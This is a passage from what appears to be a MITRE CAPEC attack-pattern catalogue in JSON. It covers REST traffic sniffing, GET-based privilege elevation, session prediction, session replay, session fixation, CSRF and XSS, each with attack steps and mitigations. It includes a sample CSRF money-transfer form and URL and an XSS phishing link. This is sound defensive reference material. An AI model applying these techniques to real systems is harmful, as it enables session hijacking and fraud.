operate."},{"Step":"2","Phase":"Experiment","Description":"[Insert a listener to sniff client-server communication] The adversary inserts a listener that must exist beyond the point where SSL is terminated. This can be placed on the client side if it is believed that sensitive information is being sent to the client as a response, although most often the listener will be placed on the server side to listen for client authentication information.","Technique":"Run wireshark or tcpdump on a device that is on the inside of a firewall, load balancer, or router of a network and capture traffic after SSL has been terminated"},{"Step":"3","Phase":"Exploit","Description":"[Gather information passed in the clear] If developers have not hashed or encrypted data sent in the sniffed request, the adversary will be able to read this data in the clear. Most commonly, they will now have a username or password that they can use to submit requests to the web service just as an authorized user"}]},"Prerequisites":{"Prerequisite":["Opportunity to intercept must exist beyond the point where SSL is terminated.","The attacker must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path."]},"Skills_Required":{"Skill":["To insert a network sniffer or other listener into the communication stream",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Implementation: Implement message level security such as HMAC in the HTTP communication","Design: Utilize defense in depth, do not rely on a single security mechanism like SSL","Design: Enforce principle of least privilege"]},"Example_Instances":{"Example":"The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the attacker can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"300"},{"CWE_ID":"287"},{"CWE_ID":"693"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Name, Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Utilizing REST\'s Trust in the System Resource to Register Man in the Middle",{"Date":"2019-09-30"}]}},"58":{"ID":"58","Name":"Restful Privilege Elevation","Abstraction":"Detailed","Status":"Draft","Description":"Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL\'d and the application\'s service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1"},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"515"}}]},"Prerequisites":{"Prerequisite":"The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete."},"Skills_Required":{"Skill":["It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side","Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose"]},"Example_Instances":{"Example":"The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"267"},{"CWE_ID":"269"}]},"References":{"Reference":{"External_Reference_ID":"REF-463"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"59":{"ID":"59","Name":"Session Credential Falsification through Prediction","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"196"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find Session IDs] The attacker interacts with the target host and finds that session IDs are used to authenticate users.","Technique":["An attacker makes many anonymous connections and records the session IDs assigned.","An attacker makes authorized connections and records the session tokens or credentials issued."]},{"Step":"2","Phase":"Explore","Description":"[Characterize IDs] The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.","Technique":["Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.","Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs","Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation."]},{"Step":"3","Phase":"Experiment","Description":"[Match issued IDs] The attacker brute forces different values of session ID and manages to predict a valid session ID.","Technique":"The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match."},{"Step":"4","Phase":"Exploit","Description":"[Use matched Session ID] The attacker uses the falsified session ID to access the target system.","Technique":["The attacker loads the session ID into their web browser and browses to restricted data or functionality.","The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality."]}]},"Prerequisites":{"Prerequisite":["The target host uses session IDs to keep track of the users.","Session IDs are used to control access to resources.","The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time)."]},"Skills_Required":{"Skill":["There are tools to brute force session ID. Those tools require a low level of knowledge.",{"Level":"Low"},"Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Use a strong source of randomness to generate a session ID.","Use adequate length session IDs","Do not use information available to the user in order to generate session ID (e.g., time).","Ideas for creating random numbers are offered by Eastlake [RFC1750]","Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format."]},"Example_Instances":{"Example":["Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969","mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID\'s using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID\'s and bypass authentication when these session ID\'s are used for authentication. See also: CVE-2001-1534"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"330"},{"CWE_ID":"331"},{"CWE_ID":"346"},{"CWE_ID":"488"},{"CWE_ID":"539"},{"CWE_ID":"200"},{"CWE_ID":"6"},{"CWE_ID":"285"},{"CWE_ID":"384"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"18","Entry_Name":"Credential/Session Prediction"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Session Prediction"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"60":{"ID":"60","Name":"Reusing Session IDs (aka Session Replay)","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker interacts with the target host and finds that session IDs are used to authenticate users."},{"Step":"2","Phase":"Explore","Description":"The attacker steals a session ID from a valid user."},{"Step":"3","Phase":"Exploit","Description":"The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID\'s original owner."}]},"Prerequisites":{"Prerequisite":["The target host uses session IDs to keep track of the users.","Session IDs are used to control access to resources.","The session IDs used by the target host are not well protected from session theft."]},"Skills_Required":{"Skill":["If an attacker can steal a valid session ID, they can then try to be authenticated with that stolen session ID.",{"Level":"Low"},"More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing their valid session ID.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Always invalidate a session ID after the user logout.","Setup a session time out for the session IDs.","Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate adversary in the middle attacks (CAPEC-94).","Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.","Encrypt the session data associated with the session ID.","Use multifactor authentication."]},"Example_Instances":{"Example":["OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428","Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user\'s answer or forward URLs. See also: CVE-2002-0258"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"294"},{"CWE_ID":"290"},{"CWE_ID":"346"},{"CWE_ID":"384"},{"CWE_ID":"488"},{"CWE_ID":"539"},{"CWE_ID":"200"},{"CWE_ID":"285"},{"CWE_ID":"664"},{"CWE_ID":"732"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1134.001","Entry_Name":"Access Token Manipulation:Token Impersonation/Theft"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1134.002","Entry_Name":"Access Token Manipulation:Create Process with Token"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.004","Entry_Name":"Use Alternate Authentication Material:Web Session Cookie"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"}]}},"61":{"ID":"61","Name":"Session Fixation","Abstraction":"Detailed","Status":"Draft","Description":"The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Setup the Attack] Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.","Technique":["The attacker chooses a predefined identifier that they know.","The attacker creates a trap session for the victim."]},{"Step":"2","Phase":"Experiment","Description":"[Attract a Victim] Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim\'s browser. This is known as fixating the session. The session identifier can be introduced into the victim\'s browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.","Technique":["Attackers can put links on web sites (such as forums, blogs, or comment forms).","Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.","Attackers can email attack URLs to potential victims through spam and phishing techniques."]},{"Step":"3","Phase":"Exploit","Description":"[Abuse the Victim\'s Session] Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.","Technique":["The attacker loads the predefined session ID into their browser and browses to protected data or functionality.","The attacker loads the predefined session ID into their software and utilizes functionality with the rights of the victim."]}]},"Prerequisites":{"Prerequisite":["Session identifiers that remain unchanged when the privilege levels change.","Permissive session management mechanism that accepts random user-generated session identifiers","Predictable session identifiers"]},"Skills_Required":{"Skill":["Only basic skills are required to determine and fixate session identifiers in a user\'s browser. Subsequent attacks may require greater skill levels depending on the attackers\' motives.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":["There are no indicators for the server since a fixated session identifier is similar to an ordinarily generated one. However, too many invalid sessions due to invalid session identifiers is a potential warning.","A client can be suspicious if a received link contains preset session identifiers. However, this depends on the client\'s knowledge of such an issue. Also, fixation through Cross Site Scripting or hidden form fields is usually difficult to detect."]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.","Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.","Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult."]},"Example_Instances":{"Example":["Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim\'s account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.","An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user\'s browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"384"},{"CWE_ID":"664"},{"CWE_ID":"732"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"37","Entry_Name":"Session Fixation"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Session fixation"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-601","Section":"Testing for Session Fixation"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"62":{"ID":"62","Name":"Cross Site Request Forgery","Abstraction":"Standard","Status":"Draft","Description":"An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users\' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user\'s system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \\"riding\\" the existing session cookie.","Alternate_Terms":{"Alternate_Term":{"Term":"Session Riding"}},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"21"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Explore target website] The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.","Technique":["Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server","Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server","View HTML source of web pages that contain links or buttons that perform actions of interest."]},{"Step":"2","Phase":"Experiment","Description":"[Create a link that when clicked on, will execute the interesting functionality.] The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.","Technique":["Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)","Create a form that will submit a POST request (e.g. <form method=\\"POST\\" action=\\"https://www.somebank.com/members/transfer.asp\\"><input type=\\"hidden\\" Name=\\"to\\" value=\\"012345678901\\"/><input type=\\"hidden\\" Name=\\"amt\\" value=\\"10000\\"/><input type=\\"submit\\" src=\\"clickhere.jpg\\"/></form>"]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to click on link] Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.","Technique":["Execute a phishing attack and send the user an e-mail convincing them to click on a link.","Execute a stored XSS attack on a website to permanently embed the malicious link into the website.","Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.","Include the malicious link on the attackers\' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site."]}]},"Skills_Required":{"Skill":["The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.","Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.","Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.","In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context."]},"Example_Instances":{"Example":{"p":["While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.","The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim\'s account.","The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"352"},{"CWE_ID":"306"},{"CWE_ID":"664"},{"CWE_ID":"732"},{"CWE_ID":"1275"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"09","Entry_Name":"Cross-Site Request Forgery"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Site Request Forgery (CSRF)"}]},"References":{"Reference":[{"External_Reference_ID":"REF-62"},{"External_Reference_ID":"REF-602","Section":"Testing for Cross Site Request Forgery"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Alternate_Terms, Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Cross Site Request Forgery (aka Session Riding)",{"Date":"2017-01-09"}]}},"63":{"ID":"63","Name":"Cross-Site Scripting (XSS)","Abstraction":"Standard","Status":"Draft","Description":"An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users\' privilege level. An attack of this type exploits a programs\' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"242"},{"Nature":"CanPrecede","CAPEC_ID":"107"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.","Use a proxy tool to record results of manual input of XSS probes in known URLs.","Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.","Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines.",{"Level":"Low"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Session tokens for specific host","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":{"p":["Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:","When the user clicks the link, the appended script also executes on the local user\'s machine."],"div":["<a href=\\"www.exampletrustedsite.com?Name=<script>maliciousscript<\/script>\\">Trusted Site</a>",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"20"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"08","Entry_Name":"Cross-Site Scripting"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Site Scripting (XSS)"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Examples-Instances, Payload, Payload_Activation_Impact, 